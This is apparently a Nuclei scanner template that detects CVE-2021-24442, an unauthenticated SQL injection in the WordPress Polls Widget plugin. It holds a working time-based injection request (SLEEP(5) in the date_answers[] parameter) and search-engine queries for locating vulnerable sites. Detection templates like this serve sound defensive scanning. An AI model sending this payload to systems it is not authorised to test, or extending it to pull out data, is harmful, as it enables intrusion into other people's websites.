id: CVE-2021-24442 info: name: Wordpress Polls Widget < 1.5.3 - SQL Injection author: ritikchaddha severity: critical description: | The Poll, Survey, Questionnaire and Voting system WordPress plugin before 1.5.3 did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks remediation: Fixed in 1.5.3 reference: - https://wpscan.com/vulnerability/7376666e-9b2a-4239-b11f-8544435b444a/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24442 - https://wordpress.org/plugins/polls-widget/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24442 cwe-id: CWE-89 epss-score: 0.1114 epss-percentile: 0.95154 cpe: cpe:2.3:a:wpdevart:poll\,_survey\,_questionnaire_and_voting_system:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: wpdevart product: poll\,_survey\,_questionnaire_and_voting_system framework: wordpress shodan-query: http.html:/wp-content/plugins/polls-widget/ fofa-query: body=/wp-content/plugins/polls-widget/ publicwww-query: "/wp-content/plugins/polls-widget/" tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli,wpdevart http: - raw: - | @timeout: 25s POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Forwarded-For: {{randstr}} question_id=1&poll_answer_securety=8df73ed4ee&date_answers%5B0%5D=SLEEP(5) matchers: - type: dsl dsl: - 'duration>=5' - 'status_code == 200' - 'contains_all(body, "{\"answer_name", "vote\":")' condition: and # digest: 4a0a0047304502203414f57b4fe1500e69a1e44d86edb4c318855b78e1113d2423dd48e3a6931a04022100f3d562735c04bf9943dbdfb808ebfa20790e58f4c6f5643d8c89eb10e12c69e6:922c64590222798bb761d5b6d8e72950